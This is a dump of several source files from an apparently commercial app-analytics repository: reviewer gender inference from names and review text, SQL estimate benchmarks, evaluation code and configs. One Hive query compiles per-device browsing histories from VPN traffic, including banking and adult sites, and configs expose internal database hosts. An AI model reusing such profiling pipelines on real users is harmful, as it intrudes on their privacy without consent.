def get_highest_probability(prob_set):
highest_p = 0.5
highest_item = np.nan
for p in prob_set:
if ((p >= 0.5) & (p >= highest_p)):
highest_p = p
highest_item = p
if ((p < 0.5) & ((1-p) > highest_p)):
highest_p = 1-p
highest_item = p
return highest_item
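# Returns the single most confident probability, keeping its original
# orientation: e.g. get_highest_probability([0.2, 0.6]) -> 0.2, since its
# confidence 1 - 0.2 = 0.8 beats 0.6.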
def name_features(word):
featdict = {}
#print word
featdict['full'] = word
featdict['length'] = len(word)
for i in range(1,5):
featdict['last_%s'%i] = word[-i:]
return featdict
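# e.g. name_features('maria') ->
#   {'full': 'maria', 'length': 5,
#    'last_1': 'a', 'last_2': 'ia', 'last_3': 'ria', 'last_4': 'aria'}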
def get_male_probability_byName(tokens, gender_classifier):
p_gender = []
for word in tokens:
p_gender.append(gender_classifier.prob_classify(name_features(word)).prob('male'))
p_gender = np.array(p_gender)
return p_gender
def text_features(text, ex_word_set):
#print text
#clean_text = text.encode('utf-8')
clean_text = unidecode(text.decode('utf-8', errors='ignore'))
clean_text = re.sub('3D', '', clean_text)
clean_text = re.sub('<(.|\n)*?>', '', clean_text)
clean_text = re.sub('&\w+;', '', clean_text)
clean_text = clean_text.replace('\n', '').lower()
tokens = wordpunct_tokenize(clean_text)
#tokens = tokens.apply(lambda x: [w for w in x if re.search('[a-zA-Z]', w) and len(w) > 1])
tokens = set(tokens)
tokens = tokens.difference(ex_word_set)
features = defaultdict(list)
for t in tokens:
features[t] = True
return features
def get_male_probability_byText(text, ex_word_set, classifier):
features = text_features(text, ex_word_set)
return classifier.prob_classify(features).prob('M')
# <codecell>
def main():
parser = argparse.ArgumentParser(description='Predict the male probability of a text in db and put it int p_male for that database')
parser.add_argument('-t','--table', help='Table name in db', required=True)
parser.add_argument('-f','--field', help='Column name with the text we want to predict language', required=True)
parser.add_argument('-s','--store_id', help='Store ID', type=int, required=True)
parser.add_argument('-c','--connection', help='Connection string to pass to postgres', required=True)
args = vars(parser.parse_args())
#CONN=psycopg2.connect('dbname=aa_reviews_android user=aa host=10.38.48.144 port=5432')
df_obs = pd.read_csv('%s/143441.csv'%DATA_DIR, error_bad_lines=False)
df_benchmark = pd.read_csv('%s/benchmark_name.csv'%DATA_DIR)
df_benchmark = df_benchmark.dropna()
clean_name_set = set(df_benchmark['clean_name'].dropna())
remove_set = set(['in', 'my', 'fan', 'king', 'art', 'man', 'love', 'guy', 'rose', 'soon', 'cookie', 'mac', 'jc', 'happy',
'case', 'bear', 'sun', 'don', 'pa', 'queen', 'delta', 'ma', 'le', 'em', 'star', 'er'])
for i in clean_name_set:
if len(i) < 4:
remove_set.add(i)
for i in clean_name_set:
if wordnet.synsets(i):
remove_set.add(i)
for i in remove_set:
clean_name_set.discard(i)
df_obs.columns = ['app_id', 'date', 'title', 'text', 'reviewer']
df_obs['reviewer'] = df_obs['reviewer'].astype(str)
df_obs['reviewer'] = df_obs['reviewer'].apply(lambda x: x.strip())
df_obs = df_obs.dropna()
df_obs = df_obs.drop_duplicates()
df_obs['reviewer'] = df_obs['reviewer'].apply(lambda x: unidecode(x.decode('utf-8', "replace")))
pattern2 = r'''\s|[A-Z][a-z]*|[a-z]*|[+/\-@&*_]'''
df_obs['token'] = df_obs['reviewer'].apply(lambda x: nltk.regexp_tokenize(x, pattern2))
for i in range(len(df_obs['token'])):
#df_obs['token_l'][i] = set()
df_obs['token'][i] = [element.lower() for element in df_obs['token'][i]]
df_obs['token'] = df_obs['token'].apply(lambda x: set(x))
df_obs['token'] = df_obs['token'].apply(lambda x: x.intersection(clean_name_set))
df_train = df_obs[df_obs['token'].apply(lambda x: len(x) <> 0)]
# <codecell>
###################
names = [(n, 'female') for n in df_benchmark['clean_name'][df_benchmark['is_male']==0]]
names += [(n, 'male') for n in df_benchmark['clean_name'][df_benchmark['is_male']==1]]
random.shuffle(names)
gender_trainset_feat = [(name_features(n), g) for (n,g) in names]
name_gender_classifier = nltk.NaiveBayesClassifier.train(gender_trainset_feat)
######################
# <codecell>
df_train['r'] = df_train['token'].apply(lambda x: get_male_probability_byName(x, name_gender_classifier))
df_train['r_highest'] = df_train['r'].apply(lambda x: get_highest_probability(x))
df_train['gender'] = 'U'
df_train['gender'][df_train['r_highest'] >= 0.90] = 'M'
df_train['gender'][df_train['r_highest'] <= 0.01] = 'F'
df_train = df_train[df_train['gender'] <> 'U']
df_train.values
sw = stopwords.words('english')
sw.extend(['ll', 've'])
# <codecell>
features_labels = []
for row in df_train.iterrows():
try:
features = text_features(row[1]['text'], sw)
features_labels.append((features, row[1]['gender']))
except:
continue
text_gender_classifier = NaiveBayesClassifier.train(features_labels)
text_gender_classifier.show_most_informative_features(20)
# <codecell>
conn1 = psycopg2.connect(args['connection'])
cur1 = conn1.cursor()
conn2 = psycopg2.connect(args['connection'])
cur2 = conn2.cursor()
conn3 = psycopg2.connect(args['connection'])
cur3 = conn3.cursor()
table = args['table']
column = args['field']
store_id = args['store_id']
if column=='reviewer':
query1 = 'SELECT reviewer, store_id, p_male_from_name, p_male_from_reviews, p_language_from_reviews FROM %s WHERE store_id=%%s and (p_male_from_reviews=%%s or p_male_from_name=%%s)'%(table)
sql3 = 'select title, text from aa_review where store_id=%s'
params1 = (store_id, -1.0, -1.0)
else:
query1 = 'SELECT %s, id FROM %s WHERE p_male=%%s and (p_language=%%s or p_language=%%s)'%(column, table)
params1 = (-1.0, 'UNKNOWN', 'en')
truncate = True
if truncate:
cur1.execute('truncate %s'%table)
cur1.execute('alter table %s drop constraint if exists reviewer_p_pkey'%table)
cur1.execute('drop index if exists reviewer_p_p_language_from_reviews1')
cur1.execute('drop index if exists reviewer_p_p_male_from_name1')
cur1.execute('drop index if exists reviewer_p_p_male_from_reviews1')
conn1.commit()
sql = 'SELECT reviewer_id, reviewer, text, title FROM aa_review WHERE reviewer!=%s AND store_id=%s ORDER BY reviewer limit 10050'
params = ('', store_id)
print cur1.mogrify(sql, params)
cur1.execute(sql, params)
batch_size = 1000
rev_list = []
for reviewer_id, reviewer, text, title in cur1:
rev_list.append({'reviewer_id': reviewer_id, 'reviewer': reviewer, 'review': '. '.join((title, text))})
if len(rev_list)>=batch_size:
reviews_df = pd.DataFrame(rev_list)
print 'Doing operations up to %s'%len(rev_list)
rev_list = []
reviews_df = reviews_df.groupby('reviewer_id')['review'].apply(lambda x: '. '.join(x)).reset_index()
reviews_df.rename(columns={0:'review'}, inplace=True)
#print reviews_df
reviews_df['p_language_from_reviews'] = '-'
reviews_df['p_language_from_reviews'] = reviews_df['review'].apply(lambda x: guess_lang(x))
reviews_df['p_male_from_reviews'] = -1.0
reviews_df['p_male_from_name'] = -1.0
reviews_df['p_male_from_reviews'][reviews_df['p_language_from_reviews']=='en'] = reviews_df['review'].apply(lambda x: get_male_probability_byText(x, sw, text_gender_classifier))
reviews_df['p_male_from_name'][reviews_df['p_language_from_reviews']=='en'] = reviews_df['reviewer'].apply(lambda x: get_p_male_from_name(x, name_gender_classifier, clean_name_set))
reviews_df['store_id'] = store_id
reviews_df = reviews_df[['reviewer_id', 'store_id', 'p_male_from_name', 'p_male_from_reviews', 'p_language_from_reviews']]
reviews_df = '\n'.join(r(reviews_df))
print 'Copying to back to table'
reviews_df = StringIO.StringIO(reviews_df)
cur2.copy_from(reviews_df, table, columns=('reviewer_id', 'store_id', 'p_male_from_name', 'p_male_from_reviews', 'p_language_from_reviews'))
conn2.commit()
if len(rev_list)>0:
reviews_df = pd.DataFrame(rev_list)
print 'Doing operations up to %s'%len(rev_list)
rev_list = []
reviews_df = reviews_df.groupby('reviewer_id')['review'].apply(lambda x: '. '.join(x)).reset_index()
reviews_df.rename(columns={0:'review'}, inplace=True)
reviews_df['p_language_from_reviews'] = '-'
reviews_df['p_language_from_reviews'] = reviews_df['review'].apply(lambda x: guess_lang(x))
reviews_df['p_male_from_reviews'] = -1.0
reviews_df['p_male_from_name'] = -1.0
reviews_df['p_male_from_reviews'][reviews_df['p_language_from_reviews']=='en'] = reviews_df['review'].apply(lambda x: get_male_probability_byText(x, sw, text_gender_classifier))
reviews_df['p_male_from_name'][reviews_df['p_language_from_reviews']=='en'] = reviews_df['reviewer'].apply(lambda x: get_p_male_from_name(x, name_gender_classifier, clean_name_set))
reviews_df['store_id'] = store_id
reviews_df = reviews_df[['reviewer_id', 'store_id', 'p_male_from_name', 'p_male_from_reviews', 'p_language_from_reviews']]
reviews_df = '\n'.join(r(reviews_df))
print 'Copying to back to table'
reviews_df = StringIO.StringIO(reviews_df)
cur2.copy_from(reviews_df, table, columns=('reviewer_id', 'store_id', 'p_male_from_name', 'p_male_from_reviews', 'p_language_from_reviews'))
conn2.commit()
print 'Making indexes'
cur2.execute('alter table %s add primary key (reviewer, store_id)'%table)
cur2.execute('create index reviewer_p_p_language_from_reviews1 on %s using btree (p_language_from_reviews)'%table)
cur2.execute('create index reviewer_p_p_male_from_name1 on %s using btree (p_male_from_name)'%table)
cur2.execute('create index reviewer_p_p_male_from_reviews1 on %s using btree (p_male_from_reviews)'%table)
conn2.commit()
conn1.close()
conn2.close()
conn3.close()
if __name__ == '__main__':
main()
<file_sep>/int-vs-m-benchmark/sql/0-settings-ios.sql
-- VERSION --
SET @version = 7;
-- TIME SETTINGS --
-- SET A SATURDAY AS @date
SET @date=20140621;
SET @run_timestamp = CURRENT_TIMESTAMP(3);
-- STORED PROCEDURES AND ESTIMATES DB
USE estimates_dev;
SET @current_db = DATABASE();
SET @current_user = SUBSTRING(USER(),1,LOCATE('@',USER())-1);
-- HOUR LINKING PENALTY --
SET @penalty = 0.05;
SET @hour_width = 2;
-- COUNTRIES --
SET @countries = 'US,NL';
-- EXCLUDE APPS FROM ESTIMATION --
SET @exclude_application_ids = '';
-- DAY WEIGHTS --
-- these weights define the weighted average of the downloads/revenues over the
-- trailing days that the ranking algorithm takes into account
-- note that the max. number of day weights is 10
SET @day_weights = '1,1,1,1,1,1,1';
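-- e.g. '1,1,1,1,1,1,1' weighs the last 7 days equally, while something like
-- '3,2,1' would weigh one end of a 3-day window three times as heavily as the
-- other (the day ordering of the weights is defined by the estimation
-- procedure itself).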
-- SET TABLE NAMES ---
SET @application_data_appstore_table = CONCAT(@current_db,'.application_data_appstore');
SET @used_rankings_appstore_table = CONCAT(@current_db,'.used_rankings_appstore');
SET @estimation_appstore_table = CONCAT(@current_db,'.new_estimation_appstore');
SET @best_estimations_appstore_table = CONCAT(@current_db,'.best_estimations_appstore');
-- Option to reset all countries in insert tables (instead of only countries
-- that are rerun).
SET @reset_tables_for_all_countries = 0;
-- SYNCING BEST-ESTIMATION TABLES --
-- set to 1 for syncing estimates_dev.best_estimations_appstore with estimates.best_estimations_appstore
SET @sync_estimates_dev_best_estimations = 0;
-- GENERAL REGRESSION PARAMETERS --
SET @regression_b2_max = 20;
SET @regression_b2_stepsize = 1;
-- FORCE RANKING TIMES --
-- forcing a ranking time per country eg.: 'GB=01:00:00,DE=02:00:00,...'
-- using the @penalty parameter to punish algorithm for deviation
SET @force_ranking_times = '';
-- BEST ESTIMATIONS LOCK TIME OUT --
-- set how long the algorithm waits for the best estimations lock before
-- erroring
SET @lock_best_estimations_table = IF(@current_db = 'estimates', 1, 0);
SET @best_estimations_lock_name = CONCAT(@current_db, '_appstore_best_estimations_lock');
SET @best_estimations_lock_time_out = 1800;
-- COUNTRY QUALITY SETTINGS FOR REPORTING --
-- set the country quality; this is only used
-- for the data checks
SET @low_quality_countries = 'FI,SA,VE,PE,UY,AZ,BY,BG,KH,CR,HR,CZ,EC,EG,GR,GT,HU,KZ,KW,LV,LB,LU,MO,NG,PL,PT,RO,SK,UA';
<file_sep>/sbe_benchmark/sumarize.py
import pandas as pd
import os
PERIOD = '2013-07'
DATA_DIR = '/Users/perezrafael/appannie/data_science/sbe_benchmark/data'
MARKET_SIZE = '/Users/perezrafael/appannie/data/market_size_%s.csv'%PERIOD
MARKET_TYPE_DICT = {'Free': 'Downloads',
'Paid': 'Downloads',
'Grossing w/ IAP': 'Revenue',
'Grossing w/o IAP': 'Revenue',
}
UNIT_DICT = {'Downloads': 'Downloads',
'USD': 'Revenue'}
RANGE_WEIGHT_DICT = {'1 to 10': 1.0,
'11 to 20': 0.9,
'21 to 200': 0.5,
'201 to end': 0.1}
def process_df(df):
df = df[df['index']=='best_case']
df = df.groupby(['store_id', 'feed_id', 'category_id', 'range']).sum().reset_index()
return df
def process_market_size(df):
df = df[df['Store']=='iOS']
df['category_id'] = df['Category'].apply(lambda x: x.replace('Games ', ''))
df['feed_id'] = df['Unit'].apply(lambda x: UNIT_DICT[x])
df['store_id'] = df['Country']
df = df.groupby(['store_id', 'category_id', 'feed_id', 'Period', 'Version', 'Value Type', 'Store']).sum().reset_index()
df.rename(columns={'Value':'market_size'}, inplace=True)
return df
def main():
market_size_df = pd.read_csv(MARKET_SIZE)
market_size_df = process_market_size(market_size_df)
models = ['webui', '7-days', 'monthly']
result= []
for root, dirs, files in os.walk(DATA_DIR):
for filename in files:  # 'filename' avoids shadowing the builtin 'file'
if filename.endswith(".csv") and 'summary_full' in filename:
filepath = os.path.join(root, filename)
df = pd.read_csv(filepath)
df['index'] = df['Unnamed: 0']
del df['Unnamed: 0']
#df = df[df['index']=='%_apps_under_20%_error']
df = df[df['index']=='mean']
#df['Store'] = platform
result.append(df)
result = pd.concat(result)
#result = result.groupby(['store_id', 'feed_id', 'category_id', 'range']).mul(axis='index').reset_index()
result = result.merge(market_size_df, on=['store_id', 'category_id', 'feed_id'])
result['rank_range_weight'] = result['range'].apply(lambda x: RANGE_WEIGHT_DICT[x])
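# Composite score per model (higher is better): inverse relative error, scaled
# by market size (larger markets count more) and by the rank-range weight
# (accuracy near the top of the charts counts more).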
for model in models:
result['weighted_inverse_average_error_%s'%model] = (1.0/result['rel_error_%s'%model]) * result['market_size'] * result['rank_range_weight']
result = result.drop_duplicates()
result.to_csv('data/final_summary.csv', index=False)
if __name__ == '__main__':
main()
<file_sep>/int-vs-m-benchmark/sql/benchmarking/get_daily_estimates.sql
drop temporary table if exists temp.dates;
create temporary table temp.dates (
constraint primary key (date)
)
select
distinct date
from
aa_benchmarking_ios.sbe_est_app_daily
where
date between @begin_date and @end_date;
DROP TEMPORARY TABLE IF EXISTS temp.aa_data;
CREATE TEMPORARY TABLE temp.aa_data
(CONSTRAINT PRIMARY KEY (ranking_date,
appstore_instance_id,
type,
application_id))
select
t.date as estimate_date,
DATE_ADD(t.date, INTERVAL 1 DAY) as ranking_date,
ai.id as appstore_instance_id,
t.store_id,
t.feed,
cm.iso_code,
ai.device_id,
fdtm.type,
-- cgm.distimo_name as category,
aa_real.units as aa_real,
t.estimate as aa_estimate,
t.rank as aa_rank,
t.app_id as application_id,
a.name as app
from
aa_benchmarking_ios.sbe_est_app_daily t
join temp.dates da
using(date)
join (
select
*
from
aa_benchmarking_ios.downloads d
union
select
app_id,
date,
store_id,
feed,
revenue as units
from
aa_benchmarking_ios.sales s
) aa_real
using(date, app_id, store_id, feed)
join aa_benchmarking_ios.country_mappings cm
using(store_id)
join aa_benchmarking_ios.feed_device_type_mappings fdtm
using(feed)
join aa_benchmarking_ios.category_mappings cgm
on t.category_id = appannie_category_id
join appstore.appstore_instances ai
on cm.country_id = ai.country_id
and fdtm.device_id = ai.device_id
join appstore.applications a
on t.app_id = a.id
where
find_in_set(cm.iso_code, @country)
and find_in_set(cgm.distimo_name, @category)
group by ranking_date,appstore_instance_id,type,application_id
;
SELECT
aa.estimate_date,
aa.ranking_date,
aa.store_id,
aa.feed,
aa.iso_code,
aa.device_id,
if(aa.device_id = 1, 'iphone', if(aa.device_id = 2, 'ipad', 'unknown')) as device,
aa.type,
-- aa.category,
aa.aa_real,
ifnull(d.derived_value, d.real_value) as d_real,
aa.aa_estimate,
d.estimate as d_estimate,
aa.aa_rank,
d.estimate_rank as d_rank,
aa.application_id,
aa.app
FROM estimates.application_data_appstore d
JOIN temp.aa_data aa
ON aa.ranking_date = d.date
AND aa.appstore_instance_id = d.appstore_instance_id
AND aa.type = d.type
AND aa.application_id = d.application_id
WHERE
d.estimate_extrapolated = 0
and d.real_value is not null;<file_sep>/aa_au_model/hive_ql/get_domains.sql
-- get, per device_id, all domains a user has requested per day
-- only works with .com addresses
-- only the last alphabetic label preceding .com is parsed
-- only requests made from Safari and Chrome are used
-- only the list of selected domains below is output
-- change the date range and the S3 output folder when running on the ds environment
DROP TABLE IF EXISTS devices_hosts;
CREATE TABLE devices_hosts
AS
SELECT
datestr,
device_id,
PARSE_URL(uri, 'HOST') AS hostname,
COUNT(*) AS times
FROM
vpn_sample_data_ingest
WHERE
datestr >= '2015-01-18'
AND datestr <= '2015-01-24'
AND (bundleid = 'com.apple.mobilesafari' OR bundleid = 'com.google.chrome.ios')
GROUP BY
datestr,
device_id,
PARSE_URL(uri, 'HOST')
;
DROP TABLE IF EXISTS devices_domains;
CREATE TABLE devices_domains
AS
SELECT
datestr,
device_id,
REGEXP_EXTRACT(hostname, '(.*?)([A-Za-z]+\\.com)', 2) AS domain,
SUM(times) AS times
FROM
devices_hosts
GROUP BY
datestr,
device_id,
REGEXP_EXTRACT(hostname, '(.*?)([A-Za-z]+\\.com)', 2)
;
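-- NOTE: the pattern keeps only the last label before .com, so subdomains
-- collapse (e.g. m.facebook.com -> facebook.com); hosts on other TLDs never
-- match, so non-.com entries in the whitelist below (wikipedia.org, t.co, ...)
-- can never be populated.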
DROP TABLE if exists top_sites;
CREATE TABLE top_sites
AS
SELECT *
FROM devices_domains
WHERE domain IN (
'google.com',
'facebook.com',
'youtube.com',
'amazon.com',
'yahoo.com',
'wikipedia.org',
'twitter.com',
'ebay.com',
'linkedin.com',
'reddit.com',
'imgur.com',
'craigslist.org',
'tumblr.com',
'go.com',
'netflix.com',
'pinterest.com',
'live.com',
't.co',
'bing.com',
'blogspot.com',
'instagram.com',
'paypal.com',
'espn.go.com',
'cnn.com',
'imdb.com',
'huffingtonpost.com',
'chase.com',
'apple.com',
'nytimes.com',
'weather.com',
'diply.com',
'yelp.com',
'wordpress.com',
'bankofamerica.com',
'buzzfeed.com',
'ziddu.com',
'microsoft.com',
'wellsfargo.com',
'stackoverflow.com',
'etsy.com',
'walmart.com',
'msn.com',
'dropbox.com',
'wikia.com',
'intuit.com',
'zillow.com',
'aol.com',
'bestbuy.com',
'comcast.net',
'foxnews.com',
'github.com',
'salesforce.com',
'about.com',
'amazonaws.com',
'washingtonpost.com',
'usps.com',
'baidu.com',
'pandora.com',
'outbrain.com',
'target.com',
'indeed.com',
'forbes.com',
'reference.com',
'kickass.so',
'hulu.com',
'adobe.com',
'groupon.com',
'cnet.com',
'slickdeals.net',
'dailymail.co.uk',
'googleusercontent.com',
'ups.com',
'businessinsider.com',
'pornhub.com',
'usatoday.com',
'americanexpress.com',
'vimeo.com',
'xvideos.com',
'tripadvisor.com',
'deviantart.com',
'homedepot.com',
'flickr.com',
'capitalone.com',
'irs.gov',
'bleacherreport.com',
'twitch.tv',
'force.com',
'microsoftonline.com',
'googleapis.com',
'newegg.com',
'wsj.com',
'gfycat.com',
'att.com',
'verizonwireless.com',
'stackexchange.com',
'bbc.com',
'ask.com',
'lifehacker.com',
'godaddy.com',
'fedex.com'
)
;
DROP TABLE if exists csvexport;
CREATE TABLE csvexport (
`datestr` string,
`device_id` string,
`domain` string,
`times` bigint)
row format delimited fields terminated by '\t'
lines terminated by '\n'
STORED AS TEXTFILE
LOCATION 's3://aardvark-prod-pdx-ds-workspace/outputfolder';
INSERT OVERWRITE TABLE csvexport
SELECT * FROM top_sites <file_sep>/evaluation/py/evaluate_quality.py
"""
Evaluate the quality of estimation.
Different processors (in internal/processor.py) can be chained together with ChainProcessor.
See internal/processor.py for how to use the different processors.
"""
# Author: <NAME> <<EMAIL>>
import os
import os.path
import sys
import pandas as pd
from internal.processor import *
monthly_evaluator = ChainProcessor(RelErrorCalculator(est_column='estimate'),
AbsErrorCalculator(est_column='estimate'),
[UnitRankRangeFilter([1, 20]),
RelErrorRatioEvaluator(0.2),
DailySbeOver20ErrorEvaluator(),
DailySbeErrorEvaluator()],
[UnitRankRangeFilter([21, 200]),
RelErrorRatioEvaluator(0.2),
DailySbeOver20ErrorEvaluator(),
DailySbeErrorEvaluator()],
[UnitRankRangeFilter([201, 1000]),
RelErrorRatioEvaluator(0.2),
DailySbeOver20ErrorEvaluator(),
DailySbeErrorEvaluator()],
[MedianRankRangeFilter([1, 20]),
SampleNumEvaluator(),
AbsErrorMedianEvaluator(),
AbsErrorAvgEvaluator(),
RelErrorMedianEvaluator(),
RelErrorAvgEvaluator()],
[MedianRankRangeFilter([21, 200]),
SampleNumEvaluator(),
AbsErrorMedianEvaluator(),
AbsErrorAvgEvaluator(),
RelErrorMedianEvaluator(),
RelErrorAvgEvaluator()],
[MedianRankRangeFilter([201, 1000]),
SampleNumEvaluator(),
AbsErrorMedianEvaluator(),
AbsErrorAvgEvaluator(),
RelErrorMedianEvaluator(),
RelErrorAvgEvaluator()],
[HeaderWriter("(All apps) "),
RelErrorRatioEvaluator(0.2),
EstimationSDEvaluator(),
KSEvaluator()])
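# Reading the chain (semantics live in internal/processor.py, per the module
# docstring): top-level processors run in sequence, and each nested list
# appears to group a filter with the evaluators that run on its filtered slice
# (e.g. a rank-range filter followed by the error metrics for that range).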
def main():
input_dir = sys.argv[1]
for f in filter(lambda s: s.endswith(".csv"), os.listdir(input_dir)):
print(f)
print("--------")
full_path = os.path.join(input_dir, f)
_estimate_quality(pd.read_csv(full_path))
def _estimate_quality(df):
(_, _, res) = monthly_evaluator.process(df)
print(res)
if __name__ == '__main__':
main()
<file_sep>/survey/201503/lib/config.py
__author__ = 'jjanssen'
'''
Definition of age bins, values in years, -1 for infinty
'''
age_bin_tuples = [ (13, 17), (18, 24), (25, 34), (35, 44),(45, 54), (55, -1)]
'''
Definition of genders
'''
genders = ['male','female']
'''
Definition of duration bins, values in minutes
'''
duration_bin_tuples = [(0,29), (30, 59), (60, 359), (360, 719), (720, -1)]
'''
Definition of population sizes
should have (#genders x #age_bins) entries
starting from the lowest age_bin
within each bin, Male first, then Female
'''
W1_POPULATION_SIZE = [ 26825449, # Male
25530584, # Female
22016187, # Male
21502052, # Female
41556996, # Male
42300666, # Female
39687243, # Male
46646006] # Female
W2_POPULATION_SIZE = [ 10670097,# Male
10202991,# Female
16018278,# Male
15195999,# Female
22353554,# Male
21778946,# Female
20205422,# Male
20319003,# Female
21279110,# Male
21849087,# Female
40861642,# Male
47872468]# Female
'''
Definition of survey datapaths
'''
W1_DATA_PATH = '../201412/data/survey_reformatted_2014Q4_US.csv'
W2_DATA_PATH = '../201503/data/survey_reformatted_2015Q1_US.csv'
<file_sep>/int-vs-m-benchmark/android-install-vs-downloads/sql/get_best_countries.sql
select
date,
appstore_instance_id,
iso_code,
type,
min(rank) as best_rank,
max(rank) as worst_rank,
count(distinct(rank)) as n_sample,
count(distinct(if(rank <= 20, rank, null))) as n_top_rank
from
market.rankings r
join (
select
distinct date
from
market.rankings
where
date between 20140601 and 20140630) x
using(date)
join market.appstore_instances ai
on r.appstore_instance_id = ai.id
join market.countries cn
on ai.country_id = cn.id
join market.rankcategories rc
on r.rankcategory_id = rc.id
join market.categories cg
on rc.category_id = cg.id
join estimates.application_data_market ad
using(date, appstore_instance_id, application_id, type)
where
cn.iso_code in ('US', 'GB', 'JP', 'DE', 'FR', 'NL', 'KR')
#cn.iso_code in ('AU', 'IT', 'RU', 'CA')
and rc.type in ('free', 'paid')
and cg.name = 'Top Overall'
and (
ad.real_value is not null
or ad.preinstalled_value is not null
)
group by
date,
appstore_instance_id,
type
order by
type,
n_top_rank DESC,
best_rank ASC,
n_sample
;<file_sep>/exact-matching-improvement/lib/config.py
import unicodedata
import sys
database = 'ds_tmp'
user= 'jjanssen'
temp_host = 'ds-rds-tmp.crlexxwtzodp.us-east-1.rds.amazonaws.com'
host = 'ds-rds-2.crlexxwtzodp.us-east-1.rds.amazonaws.com'
password = '<PASSWORD>'
DNAExcludedTermsType = {'ADDRESS':(1, 'address'),
'APP_NAME': (2, 'app_name'),
'COMPANY_SUFFIX':(3, 'company_suffix'),
'COUNTRY_ABBR': (4, 'country_abbr'),
'COUNTRY_DOMAIN':(5, 'country_domain'),
'GLOBAL_DOMAIN': (6, 'global_domain'),
'PREFIX_WORD':(7, 'prefix_word'),
'PREP': (8, 'prep'),
'WEBHOST_DOMAIN': (9, 'webhost_domain')}
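# removal_translate_table maps every codepoint whose Unicode category is
# Punctuation (P), Separator (Z), Symbol (S), Other/Control (C) or Mark (M)
# to None, for use with unicode.translate().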
removal_translate_table = dict.fromkeys(i for i in xrange(sys.maxunicode)
if unicodedata.category(unichr(i)).startswith('P')
or unicodedata.category(unichr(i)).startswith('Z')
or unicodedata.category(unichr(i)).startswith('S')
or unicodedata.category(unichr(i)).startswith('C')
or unicodedata.category(unichr(i)).startswith('M'))<file_sep>/product_quality/internal/utilities_date.py
"""
Date related utilities
"""
# Author: <NAME> <<EMAIL>>
from dateutil import rrule
from dateutil.relativedelta import relativedelta
def make_last_day_of_month(dt):
"""From
http://stackoverflow.com/questions/42950/get-last-day-of-the-month-in-python
"""
if dt.month == 12:
return dt.replace(day=31)
return dt.replace(month=dt.month + 1, day=1) - relativedelta(days=1)
def make_daily_daterange(dtstart, dtend):
"""Return the daterange specified from dtstart to dtend (inclusive), at daily level.
"""
return map(lambda x: str(x.date()),
rrule.rrule(rrule.DAILY, dtstart=dtstart, until=dtend))
<file_sep>/old_investigations/unweight_estimates.py
"""
Unweight estimates based on weights file.
"""
from optparse import OptionParser
import os.path
import pandas as pd
import numpy as np
from internal.calculate_sda import _extract_meta_info_in_filename
def parse_options():
parser = OptionParser()
parser.add_option('-e', '--estimates', dest='f_estimates',
help='Required. Estimates data, generated by run_fetch_and_concat.py')
parser.add_option('-w', '--weights', dest='f_weights',
help='Required. Weights data, generated by gen_rank_data.py')
(opts, args) = parser.parse_args()
if not opts.f_estimates:
parser.print_help()
parser.error("Estimates file is necessary!")
if not opts.f_weights:
parser.print_help()
parser.error("Weights file is necessary!")
return opts
if __name__ == '__main__':
opts = parse_options()
df_estimates = pd.read_csv(opts.f_estimates)
df_weights = pd.read_csv(opts.f_weights)
df_merged = pd.merge(df_estimates, df_weights, on=['store_id', 'category_id', 'feed_id', 'date'], how='inner')
df_merged['estimate'] = df_merged['estimate']/df_merged['weight']
df_merged[['category_id', 'rank', 'app_id', 'estimate', 'date', 'feed_id', 'store_id', 'units']].to_csv(opts.f_estimates, index=False)
print("Unweighted estimates written back to %s" % opts.f_estimates)
<file_sep>/audience/legacy_experiments/predict_reviewer_gender.py
# -*- coding: utf-8 -*-
# <nbformat>3.0</nbformat>
# <codecell>
import nltk
import pandas as pd
import random
import re
import numpy as np
from unidecode import unidecode
from guess_language import guess_language
import enchant
import psycopg2
DATA_DIR = '/home/rafael/appannie/data/demie'
CONN=psycopg2.connect("dbname=aa_reviews_android user=aa host=10.38.48.144 port=5432")
CURSOR=CONN.cursor()
def features(word):
featdict = {}
    featdict['full'] = word
    featdict['length'] = len(word)
for i in range(1,5):
featdict['last_%s'%i] = word[-i:]
return featdict
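# Example (sketch): features(u'maria') returns
#   {'full': u'maria', 'length': 5, 'last_1': u'a', 'last_2': u'ia',
#    'last_3': u'ria', 'last_4': u'aria'}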
def get_male_probability(text, regex, gender_classifier, surname_classifier):
p_gender = []
p_name = []
text = unidecode(text.decode('utf-8')).lower()
tokens = text.split(' ')
for word in tokens:
word = regex.sub('', word)
if len(word)<2 and len(tokens)>1:
continue
p_gender.append(gender_classifier.prob_classify(features(word)).prob('male'))
p_name.append(surname_classifier.prob_classify(features(word)).prob('name'))
p_gender = np.array(p_gender)
p_name = np.array(p_name)
p_male = None
if len(p_gender)>0:
p_male = np.around(p_gender[p_name.argmax()], 3)
return p_male, text, np.around(p_gender, 3), np.around(p_name, 3)
def main():
surname_df = pd.read_csv('%s/dist.all.last'%DATA_DIR)
surname_df['is_surname'] = True
surname_df['name'] = surname_df['name'].str.lower()
surname_df = surname_df.dropna()
male_df = pd.read_csv('%s/dist.male.first'%DATA_DIR)
male_df['is_male'] = True
male_df['name'] = male_df['name'].str.lower()
male_df = male_df.dropna()
female_df = pd.read_csv('%s/dist.female.first'%DATA_DIR)
female_df['is_female'] = True
female_df['name'] = female_df['name'].str.lower()
female_df = female_df.dropna()
names_df = male_df.merge(female_df, on='name', how='outer', suffixes=('_male', '_female'))
names_df['clean_name'] = names_df['name']
del names_df['name']
names_df = names_df[['clean_name', 'frecuency%_male', 'frecuency%_female', 'is_male']]
names_df['frecuency%_male'] = names_df['frecuency%_male'].fillna(0.0)
names_df['frecuency%_female'] = names_df['frecuency%_female'].fillna(0.0)
names_df['is_male'] = -1
names_df['is_male'][names_df['frecuency%_male']>names_df['frecuency%_female']] = 1
names_df['is_male'][names_df['frecuency%_male']<=names_df['frecuency%_female']] = 0
fnames = nltk.corpus.names.words('female.txt')
mnames = nltk.corpus.names.words('male.txt')
names = [(n.lower().replace(' ',''), 'female') for n in female_df['name'].values]
names += [(n.lower().replace(' ',''), 'male') for n in male_df['name'].values]
names += [(n.lower().replace(' ',''), 'female') for n in fnames]
names += [(n.lower().replace(' ',''), 'male') for n in mnames]
new = []
for i in names:
if i not in new:
new.append(i)
names = new
benchmark_df = pd.DataFrame(names, columns=['clean_name', 'gender'])
benchmark_df = benchmark_df.merge(names_df, on='clean_name', how='outer')
benchmark_df['is_male'][((np.isnan(benchmark_df['is_male'])==True)|(benchmark_df['is_male']==-1))
& (benchmark_df['gender']=='male')] = 1
benchmark_df['is_male'][((np.isnan(benchmark_df['is_male'])==True)|(benchmark_df['is_male']==-1))
& (benchmark_df['gender']=='female')] = 0
